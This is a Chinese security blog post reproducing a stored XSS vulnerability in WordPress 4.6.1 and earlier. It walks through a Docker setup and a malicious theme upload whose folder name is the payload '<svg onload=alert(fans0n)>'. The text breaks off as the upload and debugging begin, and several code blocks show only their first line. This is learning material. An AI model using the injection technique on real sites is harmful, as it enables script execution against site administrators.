Wordpress <= 4.6.1 Stored XSS 漏洞复现
我多想再见你
哪怕匆匆一眼
发现自己对web漏洞的一些点理解的还是不够深。所以准备复现一波web漏洞,加深自己对一些点的理解深度和巩固下知识!
0x00 漏洞概述
首先,我们来了解下wordresss
,WordPress是一个以PHP
和MySQL
为平台的自由开源的博客软件和内容管理系统,WordPress
具有插件架构和模板系统,截至2018年4月,排名前1000万的网站超过30.6%使用WordPress
[1]。WordPress
是最受欢迎的网站内容管理系统,WordPress
在最着名的网络发布阶段中脱颖而出。如今,它被使用在超过7000万个站点上。
WordPress
用户可以安装和切换主题。主题可让用户不改变博客内容和结构的情况下更改界面和WordPress
站点的功能。主题可以在WordPress
的“外观”管理工具中安装,或者通过FTP
上传至主题文件夹。也可以通过编辑主题中的PHP
和HTML
代码自定义主题。而漏洞是一个后台存储型XSS
漏洞,可以通过上传恶意构造的主题文件来触发。【上述内容来自维基百科】
0x01 环境搭建
本来这个环境是很容易的搭的啊,但刚开始就是一直报错,到最后一直改了又改,最终还是
1 | docker: Error response from daemon: Cannot link to a non running container |
到最后一直改了又改,最终还是报错,无奈重新搭建,果然重建是第一生产力。
1 | docker exec -it 0027a12dab6d /bin/bash |
最后终于搭建完成,命令如下
1 | docker pull wordpress:4.6.1 |
0x02 漏洞复现
首先,我们先下载一个主题
1 | wget https://downloads.wordpress.org/theme/illdy.1.0.29.zip |
并且对其illdy/style.css
进行如下更改:
1 | /* |
接着更改文件夹名字再打包:
1 | mv illdy "<svg onload=alert(fans0n)>" |
构造好之后我们登录后台上传该主题文件,同时开始动态调试。